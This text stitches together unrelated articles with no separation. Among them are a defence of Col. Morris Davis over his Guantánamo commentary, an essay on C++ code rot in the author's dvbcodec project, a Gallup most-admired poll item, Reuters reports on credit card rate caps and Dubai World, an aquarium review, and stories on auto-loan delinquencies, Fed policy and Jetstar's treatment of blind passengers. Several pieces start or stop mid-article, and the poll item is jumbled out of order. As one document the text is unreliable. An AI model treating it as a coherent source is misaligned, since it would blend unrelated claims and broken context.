Even aside from the fact that he should be entitled to express his personal opinions under his First Amendment rights , it is difficult to see how his published comments could possibly be construed as demonstrating “ poor judgment ” that “ could do serious harm to the trust and confidence Congress reposes in CRS . ”
In his Wall Street Journal article on November 10 , for example , Col .
Davis stated only that the administration ’s decision to try some prisoners in federal court and others in Military Commissions was “ a mistake . ”
As he explained , “ It will establish a dangerous legal double standard that gives some detainees superior rights and protections , and relegates others to the inferior rights and protections of military commissions .
This will only perpetuate the perception that Guantánamo and justice are mutually exclusive . ”
And in his letter to the Washington Post , he chided former AG Mukasey for claiming that the decision to try prisoners in federal courts “ comes down to a choice between protecting the American people and showcasing American justice , ” and also for implying that the Commissions were “ essential to keep detainees from returning to terrorism . ”
As he added , “ The Geneva Conventions permit detaining the enemy during armed conflicts to prevent them from causing future harm .
Criminal trials punish past misconduct .
Suggesting that the choice is either criminal prosecution or freedom is false . ”
Ironically ( given his subsequent treatment ) , Col .
Davis ’s comments about the Commissions were actually rather constructive , as he pointed out that the administration “ could legitimately choose to prosecute detainees in either forum — federal courts or military commissions — and satisfy its legal obligations , ” noting only that “ The problem is trying to have it both ways . ”
He also explained , “ It is not as if double - standard justice is required to keep suspected terrorists off our streets .
Those detainees who cannot be prosecuted can still be detained under rules the administration approves — likely in the next several months — for the indefinite detention of those who pose a threat to us during this ongoing armed conflict . ”
Jut as ironic is the fact that Davis ’s dismissal follows nearly a year at CRS in which he has , in fact , been the soul of discretion regarding his former role as the Chief Prosecutor of the Commissions , the politicization that drove him to resign , and the comments he made in February 2008 that led to the immediate resignation of William J. Haynes II , the Pentagon ’s Legal Counsel , even though countless journalists ( myself included ) would dearly love to talk to him about these matters .
Arguably , no one knew more — or , at least , felt more keenly — the politicization of the Commission process in 2007 , after the system was revived by Congress in the fall of 2006 ( following a Supreme Court ruling in June 2006 , which found that it violated both the Geneva Conventions and the Uniform Code of Military Justice ) .
Detailed accounts of Davis ’ resignation — and his subsequent explanations of his reasons for doing so , which strike at the heart of the Bush administration ’s torture regime , and its attempts to prosecute the victims of torture over Davis ’s objections — can be found , in particular , in my article , “ The Dark Heart of the Guantánamo Trials , ” but to conclude this account with a concise explanation , it is worth noting the following passages taken from that article :
[ I ] n a blistering op - ed in the Los Angeles Times , two months after his resignation , Col .
Davis stated , “ I was the chief prosecutor for the military commissions at Guantánamo Bay , Cuba , until Oct.
4 , the day I concluded that full , fair and open trials were not possible under the current system .
I resigned on that day because I felt that the system had become deeply politicized and that I could no longer do my job effectively or responsibly . ”
[ Col. Davis ] explained that the particular trigger for his decision was [ a ] memo … informing him that he had been placed in a chain of command under Haynes .
Stating that he resigned “ a few hours after ” being informed of this , he mentioned that “ Haynes was a controversial nominee for a lifetime appointment to the US 4th Circuit Court of Appeals , but his nomination died in January 2007 , in part because of his role in authorizing the use of the aggressive interrogation techniques some call torture . ”
He added , “ I had instructed the prosecutors in September 2005 [ shortly after taking the job ] that we would not offer any evidence derived by waterboarding , one of the aggressive interrogation techniques the administration has sanctioned . ”
In February 2008 , Col. Davis told Ross Tuttle of the Nation about a conversation he had with Haynes in August 2005 :
“ [ Haynes ] said these trials will be the Nuremberg of our time , ” recalled Davis , referring to the Nazi tribunals in 1945 , considered the model of procedural rights in the prosecution of war crimes .
In response , Davis said he noted that at Nuremberg there had been some acquittals , which had lent great credibility to the proceedings .
“ I said to him that if we come up short and there are some acquittals in our cases , it will at least validate the process , ” Davis continued .
“ At which point , [ Haynes 's ] eyes got wide and he said , ‘ Wait a minute , we ca n’t have acquittals .
If we ’ve been holding these guys for so long , how can we explain letting them get off ?
We ca n’t have acquittals .
We ’ve got to have convictions . ’ ”
This , I ’m sure you ’ll agree , is far more explosive than Col .
Davis ’s op - ed and letter regarding the Military Commissions , but even had he chosen to talk about these matters , he should have been free to do so .
The fact that he has not is a loss for those of us who wish to see the Bush administration held accountable for its crimes ( and who are keen to follow the chain of command from Haynes , via Susan Crawford , the Commissions ’ Convening Authority , to Dick Cheney and David Addington ) , but it also provides another demonstration that , when it came to exercising his freedom of speech whilst employed by the CRS , Col .
Davis had no intention of demonstrating “ poor judgment ” at all .
Those of us who have to tiptoe around non-standard or ancient compilers will know that template template parameters are off limits .
— Hubert Matthews ( PDF )
Long ago , way back in 2004 , I wrote an article for Overload describing how to use the Boost Spirit parser framework to generate C++ code which could convert structured binary data to text .
I went on to republish this article on my own website , where I also included a source distribution .
Much has changed since then .
The C++ language may not have , but compiler and platform support for it has improved considerably .
Boost survives — indeed , many of its libraries will feed into the next version of C ++.
Overload thrives , adapting to an age when printed magazines about programming are all but extinct .
My old website proved less durable : I ’ve changed domain name and shuffled things around more than once .
But you can still find the article online if you look hard enough , and recently someone did indeed find it .
He , let ’s call him Rick , downloaded the source code archive , dvbcodec - 1.0.zip , extracted it , scanned the README , typed :
$ make
… and discovered the code did n’t even build .
At this point many of us would assume ( correctly ) the code had not been maintained .
We ’d delete it and write off the few minutes it took to evaluate it .
Rick decided instead to contact me and let me know my code was broken .
He even offered a fix for one problem .
Sad to say , I was n’t entirely surprised .
I no longer use this code .
Unused code stops working .
It decays .
I ’m not talking about a compiled executable , which the compiler has tied to a particular platform , and which therefore progressively degrades as the platform advances .
( I ’ve heard stories about device drivers for which the source code has long been lost , and which require ever more elaborate emulation shims to keep them alive . )
I ’m talking about source code .
And the decay is n’t usually literal , though I suppose you might have a source listing on a mouldy printout , or an unreadable floppy disk .
No , the code itself is usually a pristine copy of the original .
Publishers often attach checksums to source distributions so readers can verify their download is correct .
I had n’t taken this precaution with my dvbcodec - 1.0.zip but I ’m certain the version Rick downloaded was exactly the same as the one I created 5 years ago .
Yet in that time it had stopped working .
Why ?
As already mentioned , this was C++ code .
C++ is backed by an ISO standard , ratified in 1998 , with corrigenda published in 2003 .
You might expect C++ code to improve with age , compiling and running more quickly , less likely to run out of resources .
Not so .
My favourite counter - example comes from a nice paper “ CheckedInt : A policy - based range - checked integer ” ( PDF ) published by Hubert Matthews in 2004 which discusses how to use C++ templates to implement a range - checked integer .
The paper includes a source code listing together with some notes to help readers forced to “ tiptoe around non-standard or ancient compilers ” ( think : MSVC6 ) .
Yet when I experimented with this code in 2005 I found myself tripped up by a strict and up - to - date compiler .
$ g++ - Wall -c checked_int.cpp checked_int.cpp :
In constructor ` CheckedInt<low , high , ValueChecker >:: CheckedInt ( int ) ' : checked_int.cpp:45 : error : there are no arguments to ` RangeCheck ' that depend on a template parameter , so a declaration of ` RangeCheck ' must be available checked_int.
cpp:45 : error : ( if you use ` - fpermissive ' , G++ will accept your code , but allowing the use of an undeclared name is deprecated )
I emailed Hubert Matthews using the address included at the top of his paper .
He swiftly and kindly put me straight on how to fix the problem .
What ’s interesting here is that this code is pure C++ , just over a page of it .
It has no dependencies on third party libraries .
Hubert Matthews is a C++ expert and he acknowledges the help of two more experts , Andrei Alexandrescu and Kevlin Henney , in his paper .
Yet the code fails to build using both ancient and modern compilers .
In its published form it has the briefest of shelf - lives .
Code alone is of limited use .
What really matters for its ongoing health is that someone cares about it — someone exercises , maintains and supports it .
Hubert Matthews included an email address in his paper and I was able to contact him using that address .
How well would my code shape up on this front ?
Putting myself in Rick ’s position , I unzipped the source distribution I ’d archived 5 years ago .
I was pleased to find a README which , at the very top , provides a URL for updates , http://homepage.ntlworld.com/thomas.guest.
I was less pleased to find this URL gave me a 404 Not Found error .
Similarly , when I tried emailling the project maintainer mentioned in the README , I got a 550 Invalid recipient error : the attempted delivery to thomas.guest@ntlworld.com had failed permanently .
Cool URIs do n’t change but my old NTL homepage was anything but cool ; it came for free with a dial - up connection I ’ve happily since abandoned .
Looking back , maybe I should have found a more stable location for my code .
If I ’d set up ( e.g. ) a Sourceforge project then my dvbcodec project might still be alive and supported , possibly even by a new maintainer .
Wise hindsights would n’t resurrect my code .
If I wanted to continue I ’d have to go it alone .
Here ’s what the README had to say about platform requirements .
REQUIREMENTS and PLATFORMS
To build the dvbcodec you will need Version 1.31.0 of Boost , or later .
You will also need a good C++ compiler .
The dvbcodec has been built and tested on the Windows operating system using : GCC 3.3.1 , MSVC 7.1
A “ good C++ compiler ” , eh ?
As we ’ve already seen , GCC 3.3.1 may be good but my platform has GCC 4.0.1 installed , which is better .
If my records can be believed , this upperCase ( ) function compiled cleanly using both GCC 3.3.1 and MSVC 7.1 .
std ::string upperCase ( std : : string const & lower ) { std :: string upper = lower ; for ( std:: string < char > ::iterator cc = upper.begin ( ) ; cc != upper.end ( ) ; ++cc ) { * cc = std ::toupper (* cc ) ; } return upper ; }
Huh ?
Std :: string is a typedef for std::basic_string<char > and there ’s no such thing as a std::basic_string < char >< char >:: iterator , which is what GCC 4.0.1 says :
stringutils.cpp:58 : error : ' std :: string ' is not a template
The simple fix is to write std:: string :: iterator instead of std:: string < char >::iterator .
A better fix , suggested by Rick , is to use std::transform ( ) .
I wonder why I missed this first time round ?
std ::string upperCase ( std : : string const & lower ) { std:: string upper = lower ; std::transform(upper.begin( ) , upper.end ( ) , upper.begin( ) , :: toupper ) ; return upper ; }
GCC has become stricter about what it accepts even though the formal specification of what it should do ( the C++ standard ) has stayed put .
The Boost C++ libraries have more freedom to evolve , and the next round of build problems I encountered relate to Boost .
Spirit ’s evolution .
Whilst it would be possible to require dvbcodec users to build against Boost 1.31 ( which can still be downloaded from the Boost website ) it would n’t be reasonable .
So I updated my machine ( using Macports ) to make sure I had an up to date version of Boost , 1.38 at the time of writing .
$ sudo port upgrade boost
Boost ’s various dependencies triggered an upgrade of boost - jam , gperf , libiconv , ncursesw , ncurses , gettext , zlib , bzip2 , and this single command took over an hour to complete .
I discovered that Boost .
Spirit , the C++ parser framework on which dvbcodec is based , has gone through an overhaul .
According to the change log the flavour of Spirit used by dvbcodec is now known respectfully as Spirit Classic .
A clever use of namespaces and include path forwarding meant my “ classic ” client code would at least compile , at the expense of some deprecation warnings .
Computing dependencies for decodeout.cpp ... Compiling decodeout.cpp ...
In file included from codectypedefs .
hpp:11 , from decodecontext .hpp:10 , from decodeout .
cpp:8 : /opt/local/include/boost/spirit/tree/ast.hpp:18:4 : warning : # warning
" This header is deprecated .
Please use : boost / spirit/ include/classic_ast.hpp "
In file included from codectypedefs .hpp:12 , from decodecontext .hpp:10 , from decodeout .
cpp:8 :
To suppress these warnings I included the preferred header .
I then had to change namespace directives from boost : : spirit to boost :: spirit :: classic .
I fleetingly considered porting my code to Spirit V2 , but decided against it : for even after this first round of changes , I still had a build problem .
Actually , this was a second level build problem .
The dvbcodec build has multiple phases :
it builds a program to generate code .
This generator can parse binary format syntax descriptions and emit C++ code which will convert data formatted according to these descriptions it runs this generator with the available syntax descriptions as inputs it compiles the emitted C++ code into a final dvbcodec executable
I ran into a problem during the second phase of this process .
The dvbcodec generator no longer parsed all of the supplied syntax descriptions .
Specifically , I was seeing this conditional test raise an exception when trying to parse section format syntax descriptions .
if (!parse ( section_format , section_grammar , space_p ) .full ) { throw SectionFormatParseException ( section_format ) ; }
Here , parse is boost : : spirit :: classic :: parse , which parses something — the section format syntax description , passed as a string in this case — according to the supplied grammar .
The third parameter , boost : : spirit : : classic :: space_p , is a skip parser which tells parse to skip whitespace between tokens .
Parse returns a parse_info struct whose full field is a boolean which will be set to true if the input section format has been fully consumed .
I soon figured out that the parse call was failing to fully consume binary syntax descriptions with trailing spaces , such as the the one shown below .
" program_association_section ( ) { " " table_id 8 " " section_syntax_indicator 1 " " ' 0 ' 1 " .... " CRC_32 32 " " } "
If I stripped the trailing whitespace after the closing brace before calling parse ( ) all would be fine .
I was n’t fine about this fix though .
The Spirit documentation is very good but it had been a while since I ’d read it and , as already mentioned , my code used the “ classic ” version of Spirit , in danger of becoming the “ legacy ” then “ deprecated ” and eventually the “ dead ” version .
Re-reading the documentation it was n’t clear to me exactly what the correct behaviour of parse ( ) should be in this case .
Should it fully consume trailing space ?
Had my program ever worked ?
I went back in time , downloading and building against Boost 1.31 , and satisfied myself that my code used to work , though maybe it worked due to a bug in the old version of Spirit .
Stripping trailing spaces before parsing allowed my code to work with Spirit past and present , so I curtailed my investigation and made the fix .
( Interestingly , Boost 1.31 found a way to warn me I was using a compiler it did n’t know about .
boost_1_31_0/boost/config/compiler/gcc.hpp:92:7 : warning : # warning " Unknown compiler version - please run the configure tests and report the results "
I ignored this warning . )
Apologies for the lengthy explanation in the previous section .
The point is , few software projects stand alone , and changes in any dependencies , including bug fixes , can have knock on effects .
In this instance , I consider myself lucky ; dvbcodec ’s unusual three phase build enabled me to catch a runtime error before generating the final product .
Of course , to actually catch that error , I needed to at least try building my code .
More simply : if you do n’t use your code , it rots .
It was n’t just the code which had gone off .
My source distribution included documentation — the plain text version of the article I ’d written for Overload — and the Makefile had a build target to generate an HTML version of this documentation .
This target depended on Quickbook , another Boost tool .
Quickbook generates Docbook XML from plain text source , and Docbook is a good starting point for HTML , PDF and other standard output formats .
This is quite a sophisticated toolchain .
It ’s also one I no longer use .
Most of what I write goes straight to the web and I do n’t need such a fiddly process just to produce HTML .
So I decided to freshen up dead links , leave the original documentation as a record , and simply cut the documentation target from the Makefile .
As we ’ve seen , software , like other soft organic things , breaks down over time .
How can we stop the rot ?
Freezing software to a particular executable built against a fixed set of dependencies to run on a single platform is one way — and maybe some of us still have an aging Windows 95 machine , kept alive purely to run some such frozen program .
A better solution is to actively tend the software and ensure it stays in shape .
Exercise it regularly on a build server .
Record test results .
Fix faults as and when they appear .
Review the architecture .
Upgrade the platform and dependencies .
Prune unused features , splice in new ones .
This is the path taken by the Boost project , though certainly the growth far outpaces any pruning ( the Boost 1.39 download is 5 times bigger than its 1.31 ancestor ) .
Boost takes forwards and backwards compatibility seriously , hence the ongoing support for Spirit classic and the compiler version certification headers .
Maintaining compatibility can be at odds with simplicity .
There is another way too .
Although the dvbcodec project has collapsed into disrepair the idea behind it certainly has n’t .
I ’ve taken this same idea — of parsing formal syntax descriptions to generate code which handles binary formatted data — and enhanced it to work more flexibly and with a wider range of inputs .
Whenever I come across a new binary data structure , I paste its syntax into a text file , regenerate the code , and I can work with this structure .
Unfortunately I ca n’t show you any code ( it ’s proprietary ) but I hope I ’ve shown you the idea .
Effectively , the old C++ code has been left to rot but the idea within it remains green , recoded in Python .
Maybe I should find a way to humanely destroy the C++ and all links to it , but for now I ’ll let it degrade , an illustration of its time .
Is it possible that software is not like anything else , that it is meant to be discarded : that the whole point is to see it as a soap bubble ?
— Alan J. Perlis
I would like to thank to Rick Engelbrecht for reporting and helping to fix the bugs discussed in this article .
This article first appeared in Overload 92 , and I would like to thank the team at Overload for their expert help .
However , because the poll has a margin of error of plus or minus 4 percentage points , it 's statistically a P - C draw .
The survey was ...
According to a new survey just released by USA Today and the Gallup Poll , the 62 - year - old Clinton barely beat out the 45 - year - old Palin as the most admired female -- 16 % to 15 % in a poll of 1,025 adult Americans .
A Democrat and a Republican .
A former senator and a former governor .
Two polarizing politicians , both moms , both bestselling authors , both lost their bids for one of the nation 's top elected offices last year .
One is a woman who once lived in the White House -- Hillary Rodham Clinton .
And the other is a woman suspected of harboring ambitions of living there someday -- Sarah Palin .
At the end of the 21st century 's first decade , Americans have decided on the women they admire the most -- and their picks might surprise some .
( Although probably not if they 're looking at these photos . )
... open -ended , meaning men and women respondents had to provide the names by themselves .
Not that public admiration necessarily translates to votes .
But the results have to set off any political spectator 's eager imagination about a future presidential ballot match - up between the pair who , though politically polar opposites , are both outspoken , both often underestimated and both beloved by their respective bases .
Clinton 's 17 straight years as most - or second - most - admired woman is unprecedented since Gallup began asking the question in 1948 ( when presidential daughter Margaret Truman and then - Princess , now Queen Elizabeth II were in the top 10 . )
Clinton first headed the list in 1993 as the new first lady in the White House .
And she remained highly admired as first lady throughout the public and private turmoils of her husband 's two terms , then as a senator from New York and now as the nation 's 67th secretary of State , only the third woman to hold the post .
All this despite -- or actually perhaps because of -- her brutal , toe - to - toe , sometimes bitter Democratic presidential primary contests against Barack Obama in 2008 .
Palin , on the other hand , burst onto the national political scene -- and this year 's list -- thanks to Sen .
John McCain plucking her from the political obscurity of the Alaskan permafrost as his 2008 running mate and the first woman on a presidential ticket of the party of Lincoln .
The latest new first lady , Michelle Obama , trailed on this year 's most - admired - women list .
She ended up ba ck at No.
4 . As The Ticket reported here Monday , in a separate poll , Mrs. Obama is also mirroring her husband 's plunge in approval ratings .
From November to December , her approval numbers dropped seven points , down to 55 , still higher than the president's .
( On the other hand , the favorable ratings of the equally unemployed Palin have risen into the 40s now . )
Just ahead of Mrs. O in the poll 's third place was another Illinois African American female , who helped get the Obamas into the White House : the billionaire businesswoman and TV talker Oprah Winfrey .
Predictably , among admired males , the incumbent president easily tops the list as usual .
This year , he was followed by , less predictably , his immediate predecessor , Republican ex-President George W. Bush , and then by former South African leader Nelson Mandela .
Someone named Glenn Beck -- completely unknown to us here in the predictably liberal , MSNBC - watching and indubitably elite media -- is the No. 4 most - admired male , despite -- or perhaps because of -- his 1950s haircut .
Pope Benedict XVI is fifth and the Rev. Billy Graham is No. 6 , putting him in the top 10 most admired males for the 54th consecutive year .
The Rev. Al Sharpton did not make the top 10 cut .
Neither did David Letterman .
However , just squeaking into the top 10 males most admired by Americans is Democratic ex-President Bill Clinton .
Well , actually , he tied for 10th place with the notorious cellphone texter Tiger Woods .
-- Andrew Malcolm
Speaking of bestsellers ( only it 's free ) , click here to get Twitter alerts of each new Ticket item .
Or follow us @latimestot .
And we 're also over here now on Facebook .
Photo credits : Reuters , Associated Press .
WASHINGTON , Nov 25 ( Reuters ) - Several congressional Democrats said on Wednesday they plan to introduce legislation next week to cap credit card interest rates .
With unemployment and Wall Street bonuses incongruously rising together , the chairman of the House Rules Committee said she will offer a bill to cap rates at 16 percent , a proposal that could catch a wave of Populist sentiment in the House .
“ Things were a lot better for the average person in this country when we had usury caps , ” Representative Louise Slaughter , head of the powerful rules panel , said in a statement .
“ Watching how credit card companies have exploited people by increasing rates up to 30 percent and more is criminal and this bill will allow us to put an end to this , ” she said .
The bill will be co-sponsored by Democrats John Tierney and Michael Capuano , Slaughter said .
The proposal will come in a week when the House Financial Services Committee is slated to complete its work on tightening bank and capital market regulation .
The full House is expected to vote in mid-December on broad financial reforms .
The Senate will debate reforms for months ahead , with final action unlikely until well into 2010 .
The push for reform follows last year ’s severe financial crisis , which left the economy reeling , although stock markets and major banks , bailed out by taxpayers , are recovering .
Little support for usury caps has been detected so far by policy analysts , but the mood in Congress may be turning more Populist ahead of the 2010 mid-term elections .
A bill on regulating systemic risk in the economy was amended last week in the Financial Services Committee to boost regulators ’ powers to break up “ too big to fail ” banks .
In an even more dramatic move , the committee last week voted to expose Federal Reserve monetary policy to more congressional scrutiny , a move analysts said reflected growing lawmaker anger with the Fed and the economy in general .
Senator Richard Durbin earlier this year introduced a bill that would place a 36 percent cap on annual interest rates for all forms of consumer credit -- including mortgages , payday loans and car title loans -- not just credit cards .
NEW CARD RULES
On Nov. 4 , the House approved a bill to advance the effective date for strict new rules governing card fees and interest rates .
The Democratic bill passed in a 331- 92 vote with substantial Republican support , with lawmakers citing a flood of complaints from constituents .
It applies to the largest issuers that control 80 percent of the card market .
A companion bill has been introduced in the Senate , where Banking Committee Chairman Christopher Dodd , a frequent critic of card companies , has introduced a separate measure calling for a freeze on retroactive card rate increases .
Earlier this year , Congress voted to sharply restrict card issuers ’ ability to raise rates on cardholders ’ existing balances , charge certain fees and levy unreasonable penalties .
President Barack Obama signed the limits into law in May .
Some of the changes took effect months ago .
Others are not scheduled to become effective until February and August 2010 .
In the interim , card companies have raised fees and rates to maximize profits , lawmakers and consumer advocates say .
Laws against usury , or exorbitant interest rates , were on the U.S. books at the state level until 1978 , when a Supreme Court ruling effectively eliminated them , Slaughter said .
Major card issuers include Bank of America BAC.N , Citigroup C.N , Capital One Financial COF.N , JPMorgan Chase JPM.N and American Express AXP.N. ( Reporting by Kevin Drawbaugh ; Editing by Dan Grebler ) ( ( kevin.drawbaugh@thomsonreuters.com , +1 202 898 8390 , +1 202 488 3459 ( fax ) ) )
We already covered Valencia ’s incredible zoo , the Bioparc and thought it was time to pay a visit to our aquatic friends in Europe ’s biggest aquarium , the Oceanografic .
Found at the harbor end of the City of Arts & Sciences complex , this aquarium features marine ecosystems from throughout the world .
The admission price of € 23,95 seems steep , but is money well invested .
The Oceanographic is huge , and can easily consume an entire day .
Over 45,000 individual animals of 500 different species populate the premises .
Highlights abound .
Take a walk through the shark tunnel , and try not to shiver as a gigantic Great White swims four feet over your head .
We spent too much time watching the seals play , and almost missed the wonderful , high - flying dolphin show .
Something unique we ’d never seen was a walk - in submarine aquarium — we sat on a bench , in a little bubble and almost felt like a part of the scenery , as Mediterranean fish swam around us .
The greatest attraction , though , was the Beluga whale born in captivity in the Oceanografic .
Graceful , beautiful , playful and unbelievably cute .
I wanted so badly to give that thing a hug .
The best time to visit is during the off - season ( October through May ) , in the morning hours before the school buses full of pushy , screaming children arrive .
Make sure to stop by the information stand first , to find out about special events and check the times for the dolphin shows .
And please remember not to use your flash when taking pictures through aquarium glass : ( a ) they wo n’t turn out , because the flash reflects against the glass , and ( b ) you ’ll annoy everyone around you .
We were going nuts watching amatuer photographers look in puzzlement at their digital cameras , then take another flash picture .
Then stare befuddled at the blown - out photo .
Then take another flash picture .
Befuddlement , flash , confusion , flash , frustration , flash .
If you have some time to kill and enjoy soothing music and sea life , check out our ( overly - long ) video of the Oceanografic :
Here ’s a version , starring just the Beluga :
Visit the Oceanografic website for more information , current promotions and opening hours .
More Oceanografic pictures :
NEW YORK ( Reuters ) - Dubai ’s debt woes could further unhinge an already fragile U.S. commercial real estate , as it illustrates the importance of that tiny country to global investors in an increasingly interconnected world .
A state - owned investment conglomerate Dubai World , with $ 59 billion of liabilities , set off a global stock market selloff this week after it said it wants to restructure its debt , including at its property subsidiary Nakheel .
“ This downturn has had more of a global impact , ” said Tony Ciochetti , chairman of Massachusetts Institute of Technology ’s Center for Real Estate in Cambridge , Massachusetts .
“ As I try to explain to my students , with a global economy , we ’re all attached at the hip financially in some way , shape or form , ” he added .
The Dubai news also cast doubt over the strength of the fledgling U.S. economic recovery , and the prospects for a bottoming of property prices .
On Friday alone , the Dow Jones U.S. Real Estate Index .
DJUSRE fell 2.9 percent , nearly twice the decline of broader U.S. market indexes .
“ Dubai may have to unload some very prestigious properties at distressed prices and this will drive the price of all commercial real estate lower , ” wrote Richard Bove , a banking analyst at Rochdale Securities in Lutz , Florida .
PRESTIGIOUS PROPERTIES
In the United States , Dubai World ’s portfolio includes several well - known properties , and the fallout could have a larger impact on the entire real estate market .
The company is a partner with casino operator MGM Mirage MGM.N in the $ 8.5 billion CityCenter project , which would add 6,000 rooms to a Las Vegas Strip gambling corridor already saturated with unoccupied hotel rooms .
Nakheel , perhaps best known as the developer of Dubai ’s palm - shaped islands , also carries the Mandarin Oriental and W hotels in New York in its portfolio , and has a 50 percent stake in the Fontainebleau Miami Beach resort .
And , through its Istithmar affiliate , Dubai World controls the upscale retailer Barneys New York Inc DBWLDB .UL .
The main threat to U.S. commercial property from Dubai World woes may be “ potential for contagion , ” said Sam Chandan , chief economist at Real Estate Econometrics LLC in New York .
“ It has the potential to spill over into the broader perception of real estate development and real estate as being a very risky area for exposure , ” Chandan said .
Many have already been burned .
U.S. commercial real estate values have already fallen 42.9 percent from their 2007 peak , Moody ’s Investors Service said .
Last month , delinquencies on U.S. commercial real estate loans that were packaged into commercial mortgage - backed securities reached 4.8 percent , more than six times the year earlier level , according to Trepp LLC in New York .
In a November 23 report , Moody ’s analyst Nick Levidy said prices could bottom at 45 percent to 55 percent below their peak , implying an additional 5 percent to 28 percent decline , but in a “ stress case ” could drop 65 percent from their peak .
CURRENCIES AND SUBMARINES
Like U.S. investors , foreign investors were enticed through much of this decade to buy U.S. real estate aided by cheap credit and the hope that property prices would steadily rise for a long time .
Currency fluctuations also provided a boost .
And the U.S. dollar lost about one - third of its value against a basket of currencies .
DXY since late 2002 , making it easier for foreign investors to scoop up U.S. real estate even when valuations grew too rich for investors at home .
Dubai World 's holdings go far beyond real estate .
It has a 20 percent stake in Canada 's Cirque du Soleil , and also invests in the global bank Standard Chartered Plc STAN.L and New York boutique investment bank Perella Weinberg Partners .
Other investments go farther afield -- or under water .
Dubai World is suing a former executive in a case arising from a wayward foray into submarine financing .
But Ciochetti suggested it is premature to quantify Dubai World ’s impact on U.S. commercial real estate .
“ It is hard to focus on any one particular participant and then generalize about the whole market , ” he said .
“ It illustrates that very few places and participants in the commercial real estate market are totally exempt from the global economic crisis . ”
Car loan payments that are 60 days or more late are considered a precursor to default because of the difficulty consumers face in getting caught up .
TransUnion culls its data from approximately 27 million individual credit files in its database .
While average delinquency rates rose nationwide in the third quarter , the rate fell in Washington D.C. and six states : Colorado , Louisiana , Maryland , North Dakota , South Dakota and Vermont .
The Dakotas nearly always have among the lowest delinquency rates for all types of loans , but improvement in a state like Louisiana can be seen as a positive sign , Turek said .
Year - over - year , Louisiana 's auto delinquency rate fell more than 14 percent .
" That was very good news for that part of the country , " he said , suggesting it indicates the state is beginning to show signs of recovering from the economic damage of Hurricane Katrina .
It 's too early to tell for certain , but the numbers indicate that some pockets of the country are starting to emerge from the recession earlier than other regions , Turek said .
The small increase in auto delinquencies compared with 2008 also reflects the fact that loans are harder to get , because banks and finance companies have raised their lending standards , and consumers are looking for fewer loans as they tighten their belts .
Those factors led to a drop in average auto debt in the third quarter .
Nationally , the amount outstanding on the average car loan dipped 2.5 percent to $ 12,542 , from $ 12,861 last year .
Loans taken out as part of this summer 's Cash for Clunkers program had not started to appear on most credit reports when the quarter ended .
As those new loans show up on credit files , there is a good possibility average auto debt will increase .
But since lenders offered loans only to stronger applicants , those loans are less likely to end up delinquent , Turek said .
The auto loan figures follow results that showed mortgage delinquencies hit a new high in the third quarter , but the rate of increase from the second quarter slowed .
Meanwhile , credit card delinquencies dipped in the third quarter from the second , where a seasonal increase was expected .
TransUnion forecasts the fourth - quarter auto delinquency rate will rise to almost 0.9 percent .
Fourth - quarter rates are typically higher , as consumers divert money to holiday spending .
The weak labor market will also continue to weigh on consumers , Turek said .
John Hussman is always a good read .
A week after it came out , I am catching up on reading reading " Should Come as No Shock to Anyone " .
Hussman is about as level - headed as they come , so it was interesting to see him accuse the Fed and Geithner of " Unconstitutional Abuse of Power " .
Here is the pertinent snip :
There is most probably a second wave of mortgage defaults in the immediate future as a result of Alt - A and Option - ARM resets .
Yet our capacity to deal with these losses has already been strained by the first round that largely ended in March .
The Federal Reserve has taken a massive amount of mortgage - backed securities onto a balance sheet that used to be restricted to Treasury securities .
The purchase of these securities is reflected by a surge in cash reserves held by banks .
Not only are the banks not lending these funds , they are contracting their loan portfolios rapidly .
Ultimately , in order to unwind the Fed 's position in these securities , it will have to sell them back to the public and absorb those excess reserves , so to some extent , the banking system can count on losing the deposits created by the Fed 's actions , and can't make long - term loans with these funds anyway .
Increasingly , the Fed has decided to forgo the idea of repurchase agreements ( which require the seller to repurchase the security at a later date ) , and is instead making outright purchases of the debt of government sponsored enterprises ( GSEs such as Fannie Mae and Freddie Mac ) .
Again , the Fed used to purchase only Treasuries outright , but it is purchasing agency securities with the excuse that these securities are implicitly backed by the U.S. government .
This strikes me as a huge mistake , because it effectively impairs the Fed 's ability to get rid of the securities at the price it paid for them , should Congress change its approach toward the GSEs .
It simultaneously complicates Congress ' ability to address the problem because Bernanke has tied the integrity of our monetary base to these assets .
The policy of the Fed and Treasury amounts to little more than obligating the public to defend the bondholders of mismanaged financial companies , and to absorb losses that should have been borne by irresponsible lenders .
From my perspective , this is nothing short of an unconstitutional abuse of power , as the actions of the Fed ( not to mention some of Geithner 's actions at the Treasury ) ultimately have the effect of diverting public funds to reimburse private losses , even though spending is the specifically enumerated power of the Congress alone .
Needless to say , I emphatically support recent Congressional proposals to vastly rein in the power ( both statutory and newly usurped ) of the Federal Reserve .
Starting with the Bear Stearns deal , the Fed under Ben Bernanke has made a sharp and distinct departure from its historical role , in violation of its charter .
As I noted when the bondholders of Bear Stearns were rescued , “ The troubling aspect of the Fed 's action was not that it lent to a non -bank entity .
That ability is clearly authorized by Section 13 ( 3 ) of the Federal Reserve Act .
The problem is that it made its “ loans ” as “ non-recourse ” funding – meaning that it would not stand to be repaid if the collateral itself was to fail . ”
This is still what the Fed seems determined to accomplish .
In my view , deeper loan losses are ahead , and if we deal with the next round the same way that we dealt with the last , we will ultimately succeed in debasing the U.S. dollar .
There 's little inflationary pressure at present , and chances are that fresh credit concerns will create enough demand for government liabilities to forestall inflationary pressures for several years more .
But we cannot reimburse the losses of irresponsible lenders with trillions freshly issued government liabilities without those liabilities ultimately eroding in value .
The probable real , after inflation return on stocks and bonds over the coming decade is likely to be very unsatisfactory .
Jetstar 's treatment of disabled passengers is again under scrutiny , after a blind Victorian couple claimed they were not allowed to take their guide dog on a flight .
The man and his wife , who are both blind , were told at check - in that they could not take their guide dog on board , despite having travelled with the dog on Jetstar in the past .
The couple claims Jetstar staff were unsure about the airline 's policy towards guide dogs , and they have complained to the Human Rights Commission .
Jetstar spokesman Simon Westaway says a mistake was made in the reservations centre and the airline has apologised to the couple .
" There 's been a clear oversight , we unreservedly apologise , and we 'll naturally be looking to ensure that any of the support people or systems or those throughout our organisation are completely across the policy which has been in place for the past six years , " he said .
The incident comes after Jetstar was last week forced to apologise to Paralympian Kurt Fearnley , after forcing him to surrender his wheelchair at check - in .
Mr Westaway says the two incidents are unrelated and not a reflection of the airline 's policies towards disabled passengers .
" We 've got a great record on this regard , " he said .
" We 're carrying 25,000 people a day , 13 million plus customer movements a year .
We 're an organisation which is also a learning organisation .
If there 's ways that we should be dealing with matters differently , we 're open , " he said .
The Parliamentary Secretary for Disabilities , Bill Shorten , says he has been disappointed by the latest claims against Jetstar .
He says the airline clearly has some questions to answer .
